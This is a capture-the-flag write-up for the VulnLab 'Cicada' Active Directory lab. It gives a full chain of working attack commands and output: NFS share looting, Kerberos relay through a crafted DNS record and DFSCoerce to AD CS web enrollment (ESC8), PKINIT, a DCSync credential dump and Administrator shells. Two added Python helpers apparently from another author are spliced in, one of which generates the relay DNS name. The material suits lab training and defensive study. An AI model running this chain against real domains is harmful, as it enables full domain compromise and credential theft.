VulnLab Cicada
Recon
└─$ rustscan -g -r 1-65535 -a 10.10.97.220
10.10.97.220 -> [53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389]
└─$ nmap -sC -sV -p53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389 10.10.97.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 00:13 +06
Nmap scan report for 10.10.97.220
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after: 2025-09-13T10:42:50
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-02-14T18:10:41
|_Not valid after: 2025-08-16T18:10:41
|_ssl-date: 2025-02-15T18:13:51+00:00; -1m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-15T18:13:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.51 seconds
Root
NFS is exposed (rpcbind on 111, nfs/mountd on 2049); the export list shows a single /profiles export that everyone may mount
└─$ showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)
We mount it and find the user home directories
└─$ sudo mount -t nfs cicada.vl:/profiles $PWD/share
└─$ tree -L 2 share
share
├── Administrator
│ ├── Documents
│ └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│ ├── Documents
│ └── marketing.png
└── Shirley.West
14 directories, 2 files
Rosie.Powell's home contains marketing.png, and her password is visible in the image
└─$ sudo cp share/Rosie.Powell/marketing.png .
└─$ sudo eog marketing.png
Trying the credentials over SMB returns STATUS_NOT_SUPPORTED: NTLM authentication is disabled on the DC, so every tool has to talk Kerberos from here on
└─$ nxc smb cicada.vl -u 'rosie.powell' -p '<REDACTED>'
SMB 10.10.97.220 445 10.10.97.220 [*] x64 (name:10.10.97.220) (domain:10.10.97.220) (signing:True) (SMBv1:False)
SMB 10.10.97.220 445 10.10.97.220 [-] 10.10.97.220\rosie.powell:<REDACTED> STATUS_NOT_SUPPORTED
So we authenticate with Kerberos instead (-k). This needs the DC's FQDN rather than its IP as the target, because the cifs/ SPN is derived from the host name; with that, the credentials are valid
└─$ nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [*] x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB dc-jpq225.cicada.vl 445 dc-jpq225 [+] cicada.vl\rosie.powell:<REDACTED>
AD CS is installed on the DC, and the IIS on port 80 is most likely its web enrollment endpoint (/certsrv)
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M adcs
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found PKI Enrollment Server: DC-JPQ225.cicada.vl
ADCS dc-jpq225.cicada.vl 389 DC-JPQ225 Found CN: cicada-DC-JPQ225-CA
Let's request a TGT with Impacket and use it with certipy
└─$ getTGT.py cicada.vl/rosie.powell:'<REDACTED>' -dc-ip dc-jpq225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in rosie.powell.ccache
certipy flags the CA as ESC8: web enrollment is enabled and requests are issued automatically (Request Disposition: Issue). Note that "Enforce Encryption for Requests" only concerns the RPC interface (ESC11), not the /certsrv HTTP endpoint
└─$ KRB5CCNAME=rosie.powell.ccache certipy find -k -no-pass -debug -dc-ip dc-jpq225.cicada.vl -ns 10.10.97.220 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Domain retrieved from CCache: CICADA.VL
<SNIP>
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 491BDD500EA006974F23E975392B6C4E
Certificate Validity Start : 2025-02-15 18:06:51+00:00
Certificate Validity End : 2525-02-15 18:16:51+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
The MachineAccountQuota is 10, so any user can add a computer account; the Linux path used below does not need one, but it is worth knowing
└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M maq
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP dc-jpq225.cicada.vl 389 DC-JPQ225 [+] cicada.vl\rosie.powell:<REDACTED>
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ dc-jpq225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
According to several blog posts, Kerberos authentication can be relayed:
- https://www.synacktiv.com/en/publications/relaying-kerberos-over-smb-using-krbrelayx
- https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
Doing it from a Windows machine requires adding a computer account (hence the MachineAccountQuota), but from Linux that is not needed. The only requirement is a DNS A record pointing at our box whose name has the form described in those posts: the target's short host name followed by a marshalled CREDENTIAL_TARGET_INFORMATION blob. When the DC connects to that name, Windows strips the marshalled suffix while building the SPN, so it requests a service ticket for itself (cifs/dc-jpq225) and sends it to us; a ticket for the DC's own account can then be relayed to another service on the same host, such as the ADCS web enrollment endpoint. By default any authenticated user can create a record in the AD-integrated DNS zone if it does not already exist, so we can abuse that:
└─$ bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147
[+] dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
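To make the "form described in the blogs" concrete, here is an added helper (my own example, not code from the writeup or from krbrelayx) that builds the record name for a given target and shows which SPN the Windows client will actually request. The suffix constant is copied verbatim from the bloodyAD command above; the single-label and 63-character checks are assumptions about what a usable DNS record name must satisfy, not something the writeup states.

```python
import re

# Marshalled CREDENTIAL_TARGET_INFORMATION suffix, copied from the bloodyAD command above.
# It is a fixed string (the same one the synacktiv and tiraniddo posts use), not a
# value generated per target.
MARSHALLED_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"

# Assumption: the record is a single label in the domain zone, so RFC 1035's 63-octet
# label limit applies to host name + suffix together.
MAX_DNS_LABEL = 63


def build_relay_name(target):
    """DNS record name to register: the target's short host name plus the marshalled suffix.
    Accepts 'DC-JPQ225', 'DC-JPQ225$' (sAMAccountName form) or 'dc-jpq225.cicada.vl'."""
    host = target.rstrip("$").split(".")[0].lower()
    if not host or not re.fullmatch(r"[a-z0-9-]+", host):
        raise ValueError(f"not a usable host name: {target!r}")
    name = host + MARSHALLED_SUFFIX
    if len(name) > MAX_DNS_LABEL:
        raise ValueError(f"{name} is {len(name)} chars, over the {MAX_DNS_LABEL}-char DNS label limit")
    return name


def derived_spn(dns_name, service="cifs"):
    """SPN the Windows client asks the KDC for when it connects to dns_name: the marshalled
    suffix is stripped (CredUnmarshalTargetInfo), so the ticket is for the real host, not
    for the fake name we registered. The comparison is case-sensitive because the suffix
    is a base64-style encoding."""
    if dns_name.endswith(MARSHALLED_SUFFIX):
        dns_name = dns_name[: -len(MARSHALLED_SUFFIX)]
    return f"{service}/{dns_name}"


if __name__ == "__main__":
    name = build_relay_name("DC-JPQ225$")
    print("record to add :", name, f"({len(name)} chars)")
    print("ticket issued :", derived_spn(name))
    # The same machine-account key protects every SPN of the DC, which is why a cifs/
    # ticket can be replayed to the HTTP enrollment endpoint by krbrelayx.
    print("relayed to    :", derived_spn(name, "http"))
```

The practical caveat the length check captures: a NetBIOS name is at most 15 characters, so name + suffix always fits in one label for real hosts, but a longer DNS-only host name would not.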
For coercing, use dfscoerce.py (feel free to try other coercion methods)
└─$ KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl
[-] Connecting to ncacn_np:dc-jpq225.cicada.vl[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\x00'
RootShare: 'test\x00'
ApiFlags: 1
DFSNM SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
Make sure to pull the latest krbrelayx and start it before coercing. The relay target is the /certsrv endpoint, requesting the DomainController template on behalf of the DC machine account (-v)
└─$ krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 20
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file
We got the DC's certificate, so now let's use PKINIT to get a TGT for the DC machine account
└─$ gettgtpkinit.py -cert-pfx 'DC-JPQ225$.pfx' 'cicada.vl/DC-JPQ225$' DC-JPQ225.ccache
2025-02-16 02:25:54,246 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-16 02:25:54,540 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-16 02:26:05,870 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-16 02:26:05,870 minikerberos INFO c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
INFO:minikerberos:c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9
2025-02-16 02:26:05,872 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
DCSync using the ticket (the DC's machine account has the replication rights needed)
└─$ KRB5CCNAME=DC-JPQ225.ccache secretsdump.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
Configure krb5.conf to be able to use evil-winrm
└─$ cat krb5.conf
[libdefaults]
default_realm = CICADA.VL
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
CICADA.VL = {
kdc = dc-jpq225.cicada.vl
admin_server = dc-jpq225.cicada.vl
default_domain = cicada.vl
}
[domain_realm]
cicada.vl = CICADA.VL
.cicada.vl = CICADA.VL
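Everything needed for the Kerberos-only workflow on this box (realm, KDC, /etc/hosts entry, and whether the clock skew is small enough for tickets to be accepted) is already in the nmap report above. The following is an added example of my own, not part of the writeup, that pulls those facts out of the scan and emits a krb5.conf in the same layout as the one above. The sample input is a handful of lines constructed by copying from the nmap output on this page; the 300-second skew limit is MIT krb5's default clockskew, and the generated config points at the DC explicitly (dns_lookup_* = false) instead of relying on DNS as the hand-written one does.

```python
import re

# Constructed sample: a few lines copied from the nmap report earlier on this page,
# enough to drive the parser offline. A real run feeds the whole report.
SAMPLE_NMAP = """\
Nmap scan report for 10.10.97.220
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
445/tcp open microsoft-ds?
Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode:
|_ Message signing enabled and required
"""

# MIT krb5 default clockskew: a ticket whose timestamp is further off than this is
# rejected with KRB_AP_ERR_SKEW, so the attacking box must stay inside this window.
MAX_SKEW_SECONDS = 300


def parse_skew(text):
    """Mean clock skew in signed seconds from nmap's clock-skew script, or None if absent."""
    m = re.search(r"clock-skew: mean: (-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?", text)
    if not m:
        return None
    sign, hours, minutes, seconds = m.groups()
    total = int(hours or 0) * 3600 + int(minutes or 0) * 60 + int(seconds or 0)
    return -total if sign else total


def parse_target_ip(text):
    m = re.search(r"Nmap scan report for (\d{1,3}(?:\.\d{1,3}){3})", text)
    return m.group(1) if m else None


def parse_dc_fqdn(text):
    """DC FQDN from the LDAP certificate subject. This is more reliable than the LDAP
    banner, which on this box prints the domain as 'cicada.vl0.'."""
    m = re.search(r"commonName=([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)", text)
    return m.group(1) if m else None


def build_krb5_conf(dc_fqdn):
    """krb5.conf that names the DC as KDC explicitly, in the layout used above."""
    host, _, domain = dc_fqdn.partition(".")
    realm = domain.upper()
    domain = domain.lower()
    return (
        "[libdefaults]\n"
        f"    default_realm = {realm}\n"
        "    dns_lookup_realm = false\n"
        "    dns_lookup_kdc = false\n"
        "[realms]\n"
        f"    {realm} = {{\n"
        f"        kdc = {dc_fqdn.lower()}\n"
        f"        admin_server = {dc_fqdn.lower()}\n"
        f"        default_domain = {domain}\n"
        "    }\n"
        "[domain_realm]\n"
        f"    {domain} = {realm}\n"
        f"    .{domain} = {realm}\n"
    )


def kerberos_plan(nmap_text):
    """What the scan implies for Kerberos-only authentication against the DC."""
    dc = parse_dc_fqdn(nmap_text)
    ip = parse_target_ip(nmap_text)
    skew = parse_skew(nmap_text)
    host, _, domain = (dc or "").partition(".")
    return {
        "dc_fqdn": dc,
        "realm": domain.upper() or None,
        # /etc/hosts line so the FQDN (required for a cifs/<host> SPN) resolves without DNS
        "hosts_line": f"{ip} {dc.lower()} {host.lower()}" if ip and dc else None,
        "skew_seconds": skew,
        "skew_ok": skew is not None and abs(skew) <= MAX_SKEW_SECONDS,
        # Required SMB signing rules out NTLM relay to SMB; relaying to the HTTP
        # enrollment endpoint (ESC8) is unaffected by it.
        "smb_signing_required": "Message signing enabled and required" in nmap_text,
        "krb5_conf": build_krb5_conf(dc) if dc else None,
    }


if __name__ == "__main__":
    plan = kerberos_plan(SAMPLE_NMAP)
    for key, value in plan.items():
        if key != "krb5_conf":
            print(f"{key}: {value}")
    print(plan["krb5_conf"])
```

If skew_ok comes back False, fix the local clock (or run the tooling under faketime) before requesting any ticket; every Kerberos step on this page fails otherwise.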
Since NTLM is disabled, the dumped hash cannot be used directly; request a Kerberos TGT for Administrator with it (overpass-the-hash) into the ccache below, then set the environment variables and connect
└─$ KRB5_CONFIG=krb5.conf KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache evil-winrm -i DC-JPQ225.cicada.vl -u administrator -r CICADA.VL
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\dc-jpq225\profiles$\Administrator\Documents>
Or simply wmiexec.py
└─$ KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache wmiexec.py -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type \users\administrator\desktop\root.txt
https://api.vulnlab.com/api/v1/share?id=56b13afc-3db2-468d-9536-dd298b39aab4

